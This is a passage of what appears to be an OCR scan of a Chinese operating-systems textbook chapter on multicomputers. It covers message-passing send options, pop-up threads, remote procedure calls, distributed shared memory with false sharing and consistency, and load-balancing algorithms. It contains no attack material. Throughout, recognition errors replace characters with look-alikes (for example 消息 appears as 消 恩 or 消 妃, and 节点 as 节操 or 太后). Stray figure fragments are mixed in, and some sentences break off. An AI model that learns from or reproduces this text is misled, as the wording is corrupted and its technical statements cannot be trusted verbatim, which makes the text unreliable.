使 用 了。 这 里 不 需要 复制 。 从 而 节省 了 时 间 ， 但 是 用 户 级 中 断 使 编写 
程序 变 得 藉 手 ， 并 可 能 会 要 处 理 竞争 条 件 ， 这 些 都 使 得 该 方案 难以 设 
计 并 且 几 乎 无 法 调试 。 


第 三 种 方案 是 ， 让 缓冲 区 写 时 复制 (copy on write) ， 也 就 是 说 ， 
在 消 居 发 送出 去 之 前 将 其 标记 为 只 读 。 在 消 恩 发 送出 去 之 前 ， 如 琳 绥 
冲 区 被 重用 ， 则 进行 复制 。 这 个 方案 的 问题 是 ， 除 非 缓冲 区 被 孤立 在 
目 己 的 页 面 上 ， 和 否则 对 临近 变量 的 写 操作 也 会 导致 复制 。 此 外 ， 需 要 
有 额外 的 管理 ， 因 为 这 样 的 发 送 消 息 行 为 隐 含 着 对 页 面 读 / 写 状 态 的 影 
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这 样 ， 在 发 送 端的 选择 是 
1) 阻 塞 发 送 (CPU 在 消息 传输 期 间 空间 ) 。 
2) 带 有 复制 操作 的 非 阻塞 发 送 《CPU 时 间 沪 费 在 额外 的 复制 上 ) 。 


3) 带 有 中 断 操作 的 非 阻 塞 发 送 (造成 编程 困难 ) 。 


4) 写 时 复制 (最 终 可 能 也 会 需要 额外 的 复制 ) 。 


在 正常 条 件 下 ， 第 一 种 选择 是 最 好 的 ， 特 别 是 在 有 多 线程 的 情况 
下 ， 此 时 当 一 个 线程 由 于 试图 发 送 被 阻塞 后 ， 其 他 线程 还 可 以 继续 工 
作 。 它 也 不 需要 管理 任何 内 核 缓冲 区 。 而 且 ， 正 如 将 图 8-19a 和 图 8-19b 
进行 比较 所 见 到 的 ， 如 果 不 需 要 复制 ， 通 常 消息 会 被 更 快 地 发 出 。 


请 注意 ， 有 必要 指出 ， 有 些 作者 使 用 不 同 的 判别 标准 区 分 同步 和 
异步 原 语 。 男 一 种 观点 认为 ， 只 有 发 送 者 一 直 被 阻塞 到 消息 已 被 接收 
并 且 有 响应 发 送 回来 时 为 止 ， 才 是 同步 的 (Andrews, 1991) 。 但 是 ， 
在 实时 通信 领域 中 ， 同 步 有 着 其 他 的 含义 ， 不幸 的 是 ， 它 可 能 会 导致 
混淆 。 
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多 线程 可 用 ， 这 是 一 种 简单 的 方法 。 男 外 ， 非 阻塞 receive 只 是 通知 内 
核 缓冲 区 所 在 的 位 置 ， 并 几乎 立即 返回 控制 。 可 以 使 用 中 断 来 告知 消 
妃 已 经 到 达 。 然 而 ， 中 断 方 式 编程 困难 ， 并 且 速 度 很 慢 ， 所 以 也 许 对 
于 接收 着 来 说， 更 好 的 方法 是 使 用 一 个 过 程 poll 轮 询 进来 的 消 轧 。 该 过 
程 报告 是 否 有 背 恩 正在 等 每 。 奋 是 ， 调 用 着 可 调用 get_message， 它 返 
回 第 一 个 到 达 的 消 轧 。 在 有 些 系统 中 ， 编 译 胡 可 以 在 代码 中 合适 的 地 
方 插入 po 调用， 不过， 要 掌握 以 怎样 的 频 度 使 用 poll 则 是 需要 技巧 
的 。 


还 有 男 一 个 选择 ， 其 机 制 是 在 接收 着 进程 的 地 址 空间 中 ， 一 个 消 
妃 的 到 达 目 然 地 引起 一 个 新 线程 的 创建 。 这 样 的 线程 称 为 弹出 式 线 程 
(pop-up thread) 。 这 个 线程 运行 一 个 预定 义 的 过 程 ， 其 参数 是 一 个 指 
加 进来 消 轧 的 指针 。 在 处 理 完 这 个 消 妃 之 后 ， 该 线程 直接 退出 并 被 目 
动 撤销 。 


8.2.4 ”远程 过 程 调 用 


尽管 消息 传递 模型 提供 了 一 种 构造 多 计算 机 操作 系统 的 便利 方 
式 ， 但 是 它 有 不 可 救 药 的 缺陷 : 构造 所 有 通信 的 范 型 (paradigm) 都 是 
输入 /输出 。 过 程 snd 和 receive 基 本 上 在 做 IO 工作 ， 而 许多 人 认为 IO 就 
是 一 种 错误 的 编程 模型 。 


这 个 问题 很 早 束 为 人 所 知 ， 但 是 一 直 没 有 什么 进展 ， 直 到 Birrell 和 
Nelson 在 其 论文 (Birrell 和 Nelson，1984) 中 引进 了 一 种 完全 不 同 的 方 
法 来 解决 这 个 问题 。 尽 管 其 思想 是 令 人 吃惊 的 简单 (曾经 有 人 想到 
过 ) ， 但 其 含义 却 相当 精妙 。 在 本 节 中 ， 我 们 将 讨论 其 概念 、 实 现 、 
优点 以 及 缺点 。 


简 言 之 ，Birrell 和 Nelson 所 建议 的 是 ， 人 允许 程序 调用 位 于 其 他 CPU 
中 的 过 程 。 当 机 器 1 的 进程 调用 机 器 2 的 过 程 时 ， 在 机 器 1 中 的 调用 进程 
被 挂 起， 在 机 器 2 中 被 调用 的 过 程 执行 。 可 以 在 参数 中 传递 从 调用 者 到 
被 调用 者 的 信息 ， 并 且 可 在 过 程 的 处 理 结果 中 返回 信息 。 根 本 不 存在 
对 程序 员 可 见 的 消息 传递 或 WO。 这 种 技术 即 是 所 谓 的 远程 过 程 调 用 
(Remote Procedure Call, RPC) ， 并 且 已 经 成 为 大 量 多 计算 机 的 软件 
的 基础 。 习 惯 上 ， 称 发 出 调用 的 过 程 为 客户 机 ， 而 称 被 调用 的 过 程 为 
服务 器 ， 我 们 在 这 里 也 将 采用 这 些 名 称 。 


RPC 青 后 的 思想 是 尽 可 能 使 远程 过 程 调用 像 本 地 调用 。 在 最 位 单 
的 情形 下 ， 要 调用 一 个 远程 过 程 ， 客 户 程 序 必 须 被 绑 定 在 一 个 称 为 客 
户 端 桩 《client stub) 的 小 型 库 过 程 上 ， 它 在 客户 机 地 址 空间 中 代表 服 
务 器 过 程 。 类 似 地 ， 服 务 器 程序 也 绑 定 在 一 个 称 为 服务 器 端 桩 (server 
stub) 的 过 程 上 。 这 些 过 程 隐藏 了 这 样 一 个 事实 ， 即 从 客户 机 到 服务 器 
的 过 程 调用 并 不 是 本 地 调用 。 


进行 RPC 的 实际 步 又 如 图 8-20 所 示 。 第 1 步 是 客户 机 调用 客户 病 
桩 。 该 调用 是 一 个 本 地 调用 ， 其 参数 以 通常 方式 压 入 栈 内 。 第 2 步 是 客 
己 端 桩 将 有 关 参 数 打 包 成 一 条 消息 ， 并 进行 系统 调用 来 发 出 该 消息 。 
文 个 将 参数 打包 的 过 程 称 为 编排 (marshaling) 。 第 3 步 是 内 核 将 该 消 
恩 从 客户 机 发 给 服务 器 。 第 4 步 是 内 核 将 接收 进来 的 消 明 传 送 给 服务 如 
端 桩 (通常 服务 器 端 桩 已 经 提前 调用 了 receive) 。 最 后 ， 第 5 步 是 服务 
圳 端 桩 调用 服务 器 过 程 。 应 答 则 是 在 相反 的 方向 沿 着 同一 步骤 进行 
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图 8-20 ”进行 远程 过 程 调 用 的 步 又 。 桩 用 灰色 表示 


这 里 需要 说 明 的 关键 是 由 用 户 编 写 的 客户 机 过 程 ， 只 进行 对 客户 
端 桩 的 正常 (本 地 ) 调用 ， 而 客户 端 桩 与 服务 器 过 程 同 名 。 由 于 客户 
机 过 程 和 客户 端 桩 在 同一 个 地 址 空间 ， 所 以 有 关 参 数 以 正常 方式 传 

。 类 似 地 ， 服 务 器 过 程 由 其 所 在 的 地 址 空间 中 的 一 个 过 程 用 它 所 期 
望 的 参数 进行 调用 。 对 服务 髓 过 程 而 言 ， 一 切 痢 很 正常 。 通 过 这 种 方 
式 ， 不 采用 带 有 send 和 receive 的 IO， 通过 伪造 一 个 普通 的 过 程 调用 而 
实现 了 远程 通信 。 


实现 相关 的 问题 

无 论 RPC 的 概念 是 如 何 优雅 ， 但 是 “在 草丛 中 仍然 有 儿 条 蛇 隐藏 
E” o 一 大 条 就 是 有 关 指 针 参数 的 使 用 。 通 常 ， 给 过 程 传递 一 个 指 计 是 
不 存在 问题 的 。 由 于 两 个 过 程 都 在 同一 个 虚拟 地 址 空间 中 ， 所 以 被 调 


用 的 过 程 可 以 使 用 和 调用 着 同样 的 方式 来 运用 指针 。 但 是 ， 由 于 客户 
机 和 服务 融 在 不 同 的 地 址 空间 中 ， 所 以 用 RPC 传 递 指 针 是 不 可 能 的 。 


在 某 些 情形 下 ， 可 以 使 用 一 些 技巧 使 得 传递 指针 成 为 可 能 。 假 设 
第 一 个 参数 是 一 个 指针 ， 它 指 癌 一 个 整数 k。 客 户 端 桩 可 以 编排 k 并 把 
它 发 送 给 服务 器 。 然 后 服务 器 端 桩 创建 一 个 指向 k 的 指针 并 把 它 传递 给 
服务 器 过 程 ， 这 正如 服务 右 所 期 望 的 一 样 。 当 服务 器 过 程 把 控制 返回 
给 服务 万 端 性 后 ， 后 考 把 k 送 回 客户 机 ， 这 里 新 的 k 禾 天 了 原来 旧 的 ， 
只 是 因为 服务 器 修改 了 它 。 实 际 上 ， 通 过 引用 调用 (call-by-reference) 
的 标准 调用 序列 被 复制 -恢复 (copy-restore) 所 替代 了 “。 然 而 不 季 的 
古 ， 这 个 技巧 并 不 是 忌 能 正 第 工作 的 ， 例 如 ， 如 来 要 把 指针 指向 一 幅 
图 像 或 其 他 的 复杂 数据 结构 吏 不 行 。 由 于 这 个 原因 ， 对 于 被 远程 调用 
的 过 程 而 言 ， 必 须 对 参数 做 出 某 些 限 制 。 


第 二 个 问题 征 ， 对 于 弱 类 型 的 语言 ， 如 C 语 言 ， 编 写 一 个 过 程 用 于 
计算 两 个 矢量 (数组 ， 的 内 积 且 不 规定 其 任何 一 个 矢量 的 大 小 ， 这 是 
完全 合法 的 。 每 个 矢量 可 以 由 一 个 指定 的 值 所 终止 ， 而 只 有 调用 者 和 
被 调用 的 过 程 掌 握 该 值 。 在 这 样 的 条 件 下 ， 对 于 客户 端 桩 而 言 ， 基 本 
上 没有 可 能 对 这 种 参数 进行 编排 : 没有 办 法 能 确定 它们 有 多 大 。 


第 三 个 问题 征 ， 参 数 的 类 型 并 不 总 是 能 够 推 寻 出 的 ， 甚 至 不 论 羡 
从 形式 化 规约 还 是 从 代码 目 身 。 这 方面 的 一 个 例子 是 printf， 其 参数 的 
数量 可 以 是 任意 的 (至少 一 个 ) ， 而 且 它们 的 类 型 可 以 是 整形 、 短 整 


形 、 长 整形 、 字 符 、 字 符 串 、 各 种 长 度 的 浮 点 数 以 及 其 他 类 型 的 任意 
混合 。 试 图 把 printf 作 为 远程 过 程 调用 实际 上 古 不 可 能 的 ， 因 为 C 是 如 
此 的 宽松 。 然 而 ， 如 条 有 一 条 规则 说 假如 你 不 使 用 C 或 者 C++ 来 进行 编 
程 才能 使 用 RPC， 那 么 这 条 规则 是 不 会 受 欢 迎 的 。 


第 四 个 问题 与 使 用 全 局 要 量 有 天。 通 单 ， 调 用 者 和 被 调用 过 程 除 
了 使 用 参数 之 外 ， 还 可 以 通过 全 局 变量 通信 。 如 采 家 调用 过 程 此 刻 被 
移 到 远程 机 如 上 ， 代 码 将 失效 ， 因 为 全 局 变量 不 再 是 共 译 的 了 。 


这 里 所 和 叙述 的 问题 并 不 表示 RPC 束 此 无 望 了 。 事 实 上 ，RPC 人 说 广泛 
地 使 用 ， 不 过 在 实际 中 为 了 使 RPC 正 常 工作 需要 有 一 些 限 制 和 仔细 的 


8.2.5 ”分布 式 共 享 存 储 需 


虽然 RPC 有 它 的 吸引 力 ， 但 即便 是 在 多 计算 机 里 ， 很 多 程序 员 仍 
旧 偏 爱 共享 存储 器 的 模型 并 且 愿 意 使 用 它 。 让 人 相当 吃惊 的 是 ， 采 用 
一 种 称 为 分 布 式 共享 存储 器 (Distributed Shared Memory, DSM) 

(Li, 1986; Li 和 Hudak，1989) 的 技术 ， 就 有 可 能 很 好 地 保留 共享 存 
储 狠 的 幻觉 ， 尽 管 这 个 共享 存储 器 实际 并 不 存在 。 有 了 DSM， 每 个 页 
面 都 位 于 如 图 8-1 所 示 的 某 一 个 存储 器 中 。 每 台 机 侨 有 其 自己 的 虚拟 内 
存 和 页 表 。 当 一 个 CPU 在 一 个 它 并 不 拥有 的 页 面 上 进行 LOAD 和 STORE 
时 ， 会 陷入 到 操作 系统 当中 。 然 后 操作 系统 对 该 页 面 进行 定位 ， 并 请 
求 当 前 持 有 该 页 面 的 CPU 解除 对 该 页 面 的 映射 并 通过 互连网 络 发 送 该 
页 面 。 在 该 页 面 到 达 时 ， 页 面 被 映射 进来 ， 于 是 出 错 指令 重新 启动 。 
事实 上 ， 操 作 系统 只 是 从 远程 RAM 中 而 不 是 从 本 地 磁盘 中 满足 了 这 个 
缺 页 异常 。 对 用 户 而 言 ， 机 器 看 起 来 拥有 共享 存储 器 。 


实际 的 共 译 存储 器 和 DSM 之 间 的 差别 如 图 8-21 所 示 。 在 图 8-21a 
中 ， 是 一 台 配 有 通过 硬件 实现 的 物理 共享 存储 器 的 真正 的 多 处 理 机 。 
在 图 8-21b 中 ， 有 是 由 操作 系统 实现 的 DSM。 在 图 8-21c 中 ， 我 们 看 到 另 一 
种 形式 的 共享 存储 右 ， 它 通过 更 高 层次 的 软件 实现 。 在 本 章 的 后 面部 
分 ， 我 们 会 讨论 第 三 种 方式 ， 不 过 现在 还 是 专注 于 讨论 DSM。 


机 器 1 机 器 2 机 器 1 


应 用 应 应 用 
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共享 存储 器 共享 存储 器 共享 存储 器 
a) b) c) 
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先 考察 一 些 有 关 DSM 是 如 何 工作 的 细 方 。 在 DSM 系 统 中 ， 地 址 空 


间 被 划分 为 页 面 (page) ， 这 些 页 面 分 布 在 系统 中 的 所 有 节点 上 。 当 

一 个 CPU 引 用 一 个 非 本 地 的 地 址 时 ， 束 产生 一 个 陷阱 ，DSM 软 件 调 取 
包含 该 地 址 的 页 面 并 重新 开始 出 错 指 令 。 该 指令 现在 可 以 完整 地 执行 

了 。 这 一 概念 如 图 8-22a 所 示 ， 该 系统 配 有 16 个 页 面 的 地 址 空间 ，4 个 节 
点 ， 每 个 节点 能 持 有 6 个 页 面 。 


在 这 个 例子 中 ， 如 果 CPU 0 引用 的 指令 或 数据 在 页 面 0、2、5 或 9 
中 ， 那 么 引用 在 本 地 完成 。 引 用 其 他 的 页 面 会 导致 陷入 。 例 如 ， 对 页 
面 10 的 引用 会 导致 陷入 到 DSM 软 件 ， 该 软件 把 页 面 10 从 节点 1 移 到 市 点 
0， 如 图 8-22b 所 示 。 


1. 复 制 


对 基本 系统 的 一 个 改进 是 复制 那些 只 读 页 面 ， 如 程序 代码 、 只 读 
常量 或 其 他 只 读数 据 结构 ， 它 可 以 明显 地 提高 性 能 。 举 例 来 说 ， 如 果 
在 图 8-22 中 的 页 面 10 是 一 段 程序 代码 ，CPU 0 对 它 的 使 用 可 以 导致 将 一 
个 副本 送 往 CPU 0， 从 而 不 用 打扰 CPU 1 的 原 有 存储 器 ， 如 图 8-22c 所 
示 。 在 这 种 方式 中 ，CPU 0 和 CPU 1 两 者 可 以 按 需要 经 常 同时 引用 页 面 
10， 而 不 会 产生 由 于 引用 不 存在 的 存储 器 页 面 而 导致 的 陷阱 。 


由 16 个 页 面 组 成 的 全 局 共享 的 虚拟 存储 器 
la lle see ea 
pr LY ~ 


存储 器 


网 络 


a) 


图 8-22 a 分 布 在 四 台 机 器 中 的 地 址 空间 页 面 ，b) 在 CPU 1 引用 页 面 
10 后 的 情形 ;，c) 如 果 页 面 10 是 只 读 的 并 且 使 用 了 复制 的 情形 
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有 读 操 作 在 进行 ， 实 际 上 在 只 读 页 面 的 复制 和 可 读 写 页 面 的 复制 之 间 
不 存在 差别 。 但 是 ， 如 来 一 个 被 复制 的 页 面 突 然 被 修改 了 ， 束 必须 采 
取 必 要 的 措施 来 避免 多 个 不 一 致 的 副本 人 存在。 如 何 避 免 不 一 致 性 将 在 
下 面 几 节 中 进行 讨论 。 


2. 伪 共享 


在 菏 些 关键 方式 上 DSM 系 统 与 多 处 理 机 类 似 。 在 这 两 种 系统 

当 引 用 非 本 地 存储 如 子 时 ， 从 该 子 所 在 的 机 右上 取 包 含 该 子 的 一 块 内 
存 ， 并 放 到 进行 引用 的 〈 分 别 是 内 存储 器 或 高 速 缓存 ) 相关 机 器 上 。 
一 个 重要 的 设计 问题 是 应 该 调 取 多 大 一 块 。 在 多 处 理 机 中 ， 其 高 速 组 
存 块 的 大 小 通 利 是 32 字 世 或 64 字 六 ， 这 是 为 了 避免 占用 总 线 传输 的 时 
间 过 长 。 在 DSM 系 统 中 ， 块 的 单位 必须 是 页 面 大 小 的 整数 倍 (因为 
MMU 以 页 面 方式 工作 ) ， 不 过 可 以 是 1 个 、2 个 、4 个 或 更 多 个 页 面 。 
事实 上 ， 这 样 做 整 模 拟 了 一 个 更 大 尺寸 的 页 面 。 


对 于 DSM 而 言 ， 较 大 的 页 面 大 小 有 优点 也 有 了 喘 点 。 其 最 大 的 优 扣 
征 ， 因 为 网 络 传输 的 局 动 时 间 是 相当 长 的 ， 所 以 传递 4096 字 世 并 不 比 
传输 1024 个 字 市 多 伦 费 多 少时 间 。 在 有 大 量 的 地 址 空间 需要 移动 时 ， 
通过 采用 大 单位 的 数据 传输 ， 通 单 可 减少 传输 的 次 数 。 这 个 特性 非 
党 重要 的 ， 因 为 许多 程序 表现 出 引用 上 的 局 部 性 ， 其 含义 是 如 果 一 个 


程序 引用 了 茶 页 中 的 一 个 字 ， 很 可 能 在 不 久 的 将 来 它 还 会 引用 同一 个 
页 面 中 其 他 字 。 


一 方面 ， 大 页 面 的 传输 造成 网 络 长 期 占用 ， 阻 塞 了 其 他 进程 引 
起 的 故障 。 还 有 ， 过 大 的 有 效 页 面 引起 了 另 一 个 问题 ， 称 为 伪 共 享 
(false sharing) ， 如 图 8-23 所 示 。 图 8-23 中 一 个 页 面 中 含有 两 个 无 关 的 
共享 变量 A 和 B。 进 程 1 大 量 使 用 A， 进 行 读 写 操作 。 类 似 地 ， 进 程 2 经 
常 使 用 B。 在 这 种 情形 下 ， 含 有 这 两 个 变量 的 页 面 将 在 两 台 机 器 中 来 回 
地 传送 。 


CPU 1 CPU 2 


A 和 B 是 不 相关 的 共享 变量 ， 它 
们 恰巧 在 同一 个 页 面 上 


共享 
页 面 
使 用 变量 A 使 用 变量 B 
的 代码 的 代码 


网 络 


图 8-23 含有 两 个 无 关 变 量 的 页 面 的 伪 共 享 


这 里 的 问题 是 ， 尽 管 这 些 变 量 是 无 关 的 ， 但 它们 碰巧 在 同一 个 页 
面 内 ， 所 以 当 菜 个 进程 使 用 其 中 一 个 变量 时 ， 它 也 得 到 为 一 个 。 有 效 
页 面 越 大 ， 发 生 伪 共享 的 可 能 性 也 越 高 ， 相 反 ， 有 效 页 面 越 小 ， 发 生 


伪 共 享 的 可 能 性 也 越 少 。 在 普通 的 虚拟 内 存 系统 中 不 存在 类 似 的 现 
B o 
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帮助 减少 伪 共 享 并 改善 性 能 。 但 是 ， 说 起 来 容易 做 起 来 难 。 而 且 ， 如 
果 伪 共享 中 节点 1 使 用 某 个 数组 中 的 一 个 元 素 ， 而 节点 2 使 用 同一 数组 
中 的 另 一 个 元 素 ， 那 么 即使 再 高 明 的 编译 如 也 没有 办 法 消除 这 个 问 


题 。 


3. 实 现 顺序 一 致 性 


如 有 条 不 对 可 写 页 面 进 行 复 制 ， 那 么 实现 一 致 性 是 没有 问题 的 。 每 
个 可 写 页 面 只 对 应 有 一 个 副本 ， 在 需要 时 动态 地 来 回 移动 。 由 于 并 不 
年 总 能 所 前 了 解 哪些 页 面 是 可 写 的 ， 所 以 在 许多 DSM 系 统 中 ， 当 一 个 
进程 试图 读 一 个 远程 页 面 时 ， 则 复制 一 个 本 地 副本 ， 在 本 地 和 远程 各 
目 对 应 的 MMU 中 建立 只 读 副本 。 只 要 所 有 的 引用 都 做 读 操 作 ， 那 么 一 
WER ° 


但 是 ， 如 末 有 一 个 进程 试图 在 一 个 被 复制 的 页 面 上 写 入 ， 漠 在 的 
一 致 性 问题 束 会 出 现 ， 因 为 只 修改 一 个 副本 却 不 管 其 他 副本 的 做 法 是 
不 能 接受 的 。 这 种 情形 与 在 多 处 理 机 中 一 个 CPU 试 图 修改 存在 于 多 个 
高 速 缓存 中 的 一 个 字 的 情况 有 类 似 之 处 。 在 多 处 理 机 中 的 解决 方案 
， 要 进行 写 的 CPU 首先 将 一 个 信号 放 到 总 线 上 ， 通 知 所 有 其 他 的 


ail 


CPU 技 弃 该 高 速 缓存 块 的 副本 。 这 里 的 DSM 系 统 以 同样 的 方式 工作 。 
在 对 一 个 共 至 页 面 进行 写 入 之 前 ， 先 同 所 有 皖 有 该 页 面 副本 的 CPU 发 
出 一 条 消 筷 ， 通 知 它们 解除 映 味 并 丢弃 该 页 面 。 在 其 所 有 解除 映射 等 
工作 完成 之 后 ， 该 CPU 便 可 以 进行 写 操作 了 。 


在 有 详细 约束 的 情况 下 ， 人 允许 可 写 页 面 的 多 个 副本 存在 是 有 可 能 
的 。 一 种 方法 是 允许 一 个 进程 获得 在 部 分 虚拟 地 址 空间 上 的 一 把 锁 ， 
然后 在 被 锁 住 的 存储 空间 中 进行 多 个 读 写 操 作 。 在 该 锁 被 释放 时 ， 产 
生 的 修改 可 以 传播 到 其 他 副本 上 去 。 只 要 在 一 个 给 定 的 时 刻 只 有 一 个 
CPU 能 锁 住 茶 个 页 面 ， 这 样 的 机 制 束 能 保持 一 致 性 。 


另 一 种 方法 是 ， 当 一 个 潜在 可 写 的 页 面 被 第 一 次 真正 写 入 时 ， 制 
作 一 个 “干净 ”的 副本 并 保存 在 发 出 写 操作 的 CPU 上 “。 人 然后 可 在 该 页 上 加 
锁 ， 更 新 页 面 ， 并 释放 锁 。 稍 后 ， 当 一 个 远程 机 器 上 的 进程 试图 获得 
该 页 面 上 的 锁 时 ， 先 前 进行 写 操作 的 CPU 将 该 页 面 的 当前 状态 与 “ 干 
净 ? 副 本 进行 比较 并 构造 一 个 有 关 所 有 已 修改 的 字 的 列表 ， 该 列表 接着 
被 送 往 获 得 锁 的 CPU， 这 样 它 就 可 以 更 新 其 副本 页 面 而 不 用 废弃 它 
(Keleher 等 人 ，1994) 。 


8.26 ”多 计算 机 调度 


在 一 台 多 处 理 机 中 ， 所 有 的 进程 都 在 同一 个 存储 侨 中 。 当 某 个 
CPU 完成 其 当前 任务 后 ， 它 选择 一 个 进程 并 运行 。 理 论 上 ， 所 有 的 进 
程 都 是 潜在 的 候选 者 。 而 在 一 台 多 计算 机 中 ， 人 情形 就 大 不 相同 了 。 每 
个 节点 有 其 目 己 的 存储 占 和 进程 集合 。CPU 1 不 能 突然 决定 运行 位 于 
市 态 4 上 的 一 个 进程 ， 而 不 事先 花费 相当 大 的 工作 量 去 获得 该 进程 。 这 
种 差别 说 明 在 多 计算 机 上 的 调度 较为 容易 ， 但 是 将 进程 分 配 到 和 点 上 
的 工作 更 为 重要 。 下 面 我 们 将 讨论 这 些 问题 。 


多 计算 机 调度 与 多 处 理 机 的 调度 有 些 类 似 ， 但 是 并 不 是 后 者 的 所 
有 算法 都 能 适用 于 前 者 。 最 简单 的 多 处 理 机 算法 一 一 维护 就 绪 进 程 的 
一 个 中 心 链 表 一 一 就 不 能 工作 ， 因 为 每 个 进程 只 能 在 其 当前 所 在 的 
CPU 上 运行 。 不 过 ， 当 创建 一 个 新 进程 时 ， 存 在 着 一 个 决定 将 其 放 在 
哪里 的 选择 ， 例 如 ， 从 平衡 负载 的 考虑 出 发 。 


由 于 每 个 市 点 拥有 自己 的 进程 ， 因 此 可 以 应 用 任何 本 地 调度 算 
法 。 但 是 ， 仍 有 可 能 采用 多 处 理 机 的 群 调度 ， 因 为 惟一 的 要 求 是 有 一 
个 初始 的 协议 来 决定 哪个 进程 在 哪个 时 间 模 中 运行 ， 以 及 用 于 协调 时 
间 槽 的 起 点 的 某 种 方法 。 


8.2.7 ”负载 平衡 


需要 讨论 的 有 关 多 计算 机 调度 的 内 容 相对 较 少 。 这 是 因为 一 旦 
个 进程 被 指定 给 了 一 个 节操 ， 束 可 以 使 用 任何 本 地 调度 算法 ， 除 非 正 
在 使 用 群 调 度 。 不 过 ， 一 旦 一 个 进程 被 指定 给 了 某 个 节操 ， 束 不 再 有 
什么 可 控制 的 ， 因 此 ， 哪 个 进程 被 指定 给 哪个 太后 的 决 全 是 很 重要 
的 。 这 同 多 处 理 机 系统 相反 ， 在 多 处 理 机 系统 中 所 有 的 进程 都 在 同一 
个 存储 器 中 ， 可 以 随意 调度 到 任何 CPU 上 运行 。 因 此 ， 值 得 考察 怎样 
以 有 效 的 方式 把 进程 分 配 到 各 个 节点 上 。 从 事 这 种 分 配 工作 的 算法 和 
启发 则 是 所 谓 的 处 理 器 分 配 算 法 (processor allocation algorithm) ° 


多 年 来 已 出 现 了 大 量 的 处 理 絮 〈 节 点 ) 分 配 算法 。 它 们 的 差别 是 
分 别 有 各 目的 前 提 和 目标 。 可 知 的 进程 属性 包括 CPU 需求 、 存 储 器 使 
用 以 及 与 每 个 其 他 进程 的 通信 量 等 。 可 能 的 目标 包括 最 小 化 由 于 缺少 
本 地 工作 而 浪费 的 CPU 周期 ， 最 小 化 总 的 通信 带宽 ， 以 及 确保 用 户 和 
进程 公平 性 等 。 下 面 将 讨论 几 个 算法 ， 以 使 读者 了 解 各 种 可 能 的 情 
证 


1. 图 论 确定 算法 


有 一 类 被 广泛 研究 的 算法 用 于 下 面 这 样 一 个 系统 ， 该 系统 包 侣 已 
知 CPU 和 存储 右 需 求 的 进程 ， 以 及 给 出 每 对 进程 之 间 平 均 流 量 的 已 知 


和 窃 阵 。 如 采 进 程 的 数量 大 于 CPU 的 数量 k， 则 必须 把 徊 干 个 进程 分 配给 
每 个 CPU。 其 想法 站 以 最 小 的 网 络 流 量 完 成 这 个 分 配 工作 。 


该 系统 可 以 用 一 个 市 权 几 表示 ， 每 个 顶点 是 一 个 进程 ， 而 每 个 弧 
代表 两 个 进程 之 间 的 消 轧 流 。 在 数学 上 ， 该 问题 融 商 化 为 在 特定 的 限 
制 条 件 下 〈 如 每 个 子 图 对 整个 CPU 和 存储 器 的 需求 低 于 某 些 限制 ) ， 
寻找 一 个 将 图 分 割 JH) 为 k 个 互 不 连接 的 子 图 的 方法 。 对 于 每 个 满 
足 限制 条 件 的 解决 方案 ， 完 全 在 单个 子 图 内 的 弧 代 表 了 机 器 内 部 的 通 
信 ， 可 以 忽略 。 从 一 个 子 岁 通 辣 另 一 个 子 图 的 弧 代 表 网 络 通信 。 目标 
征 找 出 可 以 使 网 络 流量 最 小 同时 满足 所 有 的 限制 条 件 的 分 割 方 法 。 作 
为 一 个 例子 ， 图 8-24 给 出 了 一 个 有 9 个 进程 的 系统 ， 这 9 个 进程 是 进程 A 
至 1， 每 个 弧 上 标 有 两 个 进程 之 间 的 平均 通信 负载 (例如 ， 以 Mbps 为 单 
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在 图 8-24a 中 ， 我 们 将 有 进程 A、E 和 G 的 图 划分 到 节点 1 上 ， 进 程 
B、F 和 H 划 分 在 节点 2 上 ， 而 进程 C、DD 和 I 划分 在 节点 3 上 。 整 个 网 络 流 
量 是 被 切割 (虚线 ) 的 弧 上 的 流量 之 和 ， 即 30 个 单位 。 在 图 8-24b 中 ， 
有 一 种 不 同 的 划分 方法 ， 只 有 28 个 单位 的 网 络 流量 。 假 设 该 方法 满足 
所 有 的 存储 器 和 CPU 的 限制 条 件 ， 那 么 这 个 方法 就 是 一 个 更 好 的 选 


择 ， 因 为 它 需 要 较 少 的 通信 流量 。 
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i D 和 I 之 间 
的 流量 


图 8-24 将 9 个 进程 分 配 到 3 个 斑点 上 的 两 种 方法 


直观 地 看 ， 我 们 所 做 的 是 寻找 紧 厢 合 ENAME) ARR 
(cluster) ， 并 且 与 其 他 的 复 有 较 少 的 交互 ( 簇 外 低 流量 ) 。 讨 论 这 些 
问题 的 最 早 的 论文 是 (Chow 和 Abraham，1982; Lo, 1984; Stone 和 
Bokhari，1978) 等 。 


2. 发 送 首发 起 的 分 布 式 局 发 算法 


现在 看 一 些 分 布 式 算法 。 有 一 个 算法 是 这 样 的 ， 当 进程 创建 时 ， 
它 就 运行 在 创建 它 的 节点 上 ， 除 非 该 节点 过 载 了 。 过 载 季 点 的 度量 可 
能 涉及 太 多 的 进程 ， 过 大 的 工作 集 ， 或 者 其 他 度量 。 如 果 过 载 了 ， 该 
节点 随机 选择 另 一 个 节点 并 询问 它 的 负载 情况 (使 用 同样 的 度量 ) 。 
如 采 被 探查 的 节点 负载 低 于 某 个 病 值 ， 束 将 新 的 进程 送 到 该 节点 上 
(Eager 等 人 ，1986) 。 如 果 不 是 ， 则 选择 男 一 个 机 器 探查 。 探 查 工 作 
并 不 会 永远 进行 下 去 。 在 N 次 探查 之 内 ， 如 果 没 有 找到 合适 的 主机 ， 算 
法 束 终 止 ， 且 进程 继续 在 原 有 的 机 融 上 运行 。 整 个 算法 的 思想 古人 负载 
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发 起 的 人 负载 平衡 。 


图 8.25 a) 过 载 的 节点 寻找 可 以 接收 进程 的 轻 载 节 点 ，b) 一 个 空 节点 
寻找 工作 做 


Eager 等 人 (1986) 构造 了 一 个 该 算法 的 分 析 排 队 模型 (queueing 
model) 。 使 用 这 个 模型 ， 所 建立 的 算法 表现 良好 而 且 在 包括 不 同 的 闭 
值 、 传 输 成 本 以 及 探查 限定 等 大 范围 的 参数 内 工作 稳定 。 


旦 是 ， 应 该 看 到 在 负载 重 的 条 件 下 ， 所 有 的 机 瑚 都 会 持续 地 对 其 
他 机 需 进 行 探 查 ， 徒 荔 地 试图 找到 一 台 愿 意 接 收 更 多 工作 的 机 器 。 几 
乎 没有 进程 能 够 被 芭 载 ， 可 是 这 样 的 答 试 会 市 来 巨大 的 开销 。 


但 是 


3. 接 收 首发 起 的 分 布 式 局 发 算法 


上 上 面 所 给 出 的 算法 是 由 一 个 过 载 的 发 送 者 发 起 的 ， 它 的 一 个 互补 
算法 是 由 一 个 轻 载 的 接收 者 发 起 的 ， 如 图 8-25b 所 示 。 在 这 个 算法 中 ， 
